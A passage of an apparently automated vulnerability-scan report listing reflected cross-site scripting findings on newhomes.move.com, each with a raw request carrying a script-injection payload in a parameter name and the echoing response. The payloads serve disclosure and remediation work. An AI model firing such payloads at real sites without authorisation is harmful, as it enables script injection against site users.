Set-Cookie: ASP.NET_SessionId=gba5g455itkjwa45tfjs3kq2; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:47 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 173715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc"><script>alert(1)</script>82ed0c235b1=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc">
...[SNIP]...

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46d92--><script>alert(1)</script>7f5af089e29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174/city-fort+mill?46d92--><script>alert(1)</script>7f5af089e29=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:55 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zrrw3qjk3wkfv455acwb3k45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:55 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92--><script>alert(1)</script>7f5af089e29=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92-->
...[SNIP]...

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 506e9--><script>alert(1)</script>d887f385758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-177?506e9--><script>alert(1)</script>d887f385758=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=aqw2da3giqdu4knfvqjgln55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9--><script>alert(1)</script>d887f385758=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9-->
...[SNIP]...

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2032"><script>alert(1)</script>4cf364eea8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-177?c2032"><script>alert(1)</script>4cf364eea8b=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=xywlpfzqpzpxn4rgc4bivgix; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032"><script>alert(1)</script>4cf364eea8b=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032">
...[SNIP]...

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9751"><script>alert(1)</script>db94b3e8444 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18?f9751"><script>alert(1)</script>db94b3e8444=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=4ydqttqmnj0uxkqz2fe5ntmn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 197988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751"><script>alert(1)</script>db94b3e8444=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751">
...[SNIP]...

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 162ed--><script>alert(1)</script>28afb1b29a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18?162ed--><script>alert(1)</script>28afb1b29a8=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=2rs5k355bbeyy2fwhwvrbx55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 198065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed--><script>alert(1)</script>28afb1b29a8=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed-->
...[SNIP]...

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac969"><script>alert(1)</script>b554311ff46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-avondale?ac969"><script>alert(1)</script>b554311ff46=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=qqgt2hmru4a2kw45q3siahby; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 187815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969"><script>alert(1)</script>b554311ff46=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969">
...[SNIP]...

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7457--><script>alert(1)</script>71771dcee16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-avondale?e7457--><script>alert(1)</script>71771dcee16=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=s4pk0ly3pd5wvmf2su0cqk45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:56 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457--><script>alert(1)</script>71771dcee16=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457-->
...[SNIP]...

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207b1"><script>alert(1)</script>4ee4cd55297 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-buckeye?207b1"><script>alert(1)</script>4ee4cd55297=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1gfq2255yyjb2pyocnm03245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1"><script>alert(1)</script>4ee4cd55297=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1">
...[SNIP]...

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60fb9--><script>alert(1)</script>bb17cbf6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-buckeye?60fb9--><script>alert(1)</script>bb17cbf6454=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:03 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ujeksd55tey4ds45fumcndyw; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:03 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:23:03 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9--><script>alert(1)</script>bb17cbf6454=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9-->
...[SNIP]...

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939a2"><script>alert(1)</script>e5a48127910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-cumming?939a2"><script>alert(1)</script>e5a48127910=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ixvulrjjshyhpl55uv0lr155; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 178455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2"><script>alert(1)</script>e5a48127910=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2">
...[SNIP]...

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eeab--><script>alert(1)</script>e67e3e5ac27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-cumming?8eeab--><script>alert(1)</script>e67e3e5ac27=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=miux5fiavgqssc55vsdsj1fu; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 177912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab--><script>alert(1)</script>e67e3e5ac27=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab-->
...[SNIP]...

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cb2"><script>alert(1)</script>7ee17c50deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-fairburn?87cb2"><script>alert(1)</script>7ee17c50deb=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ynu2qo45clascx550mcaoj55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2"><script>alert(1)</script>7ee17c50deb=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2">
...[SNIP]...

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eee0f--><script>alert(1)</script>09637d22ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-fairburn?eee0f--><script>alert(1)</script>09637d22ded=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=q1xasr45fxifggbzycoaffaj; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174043


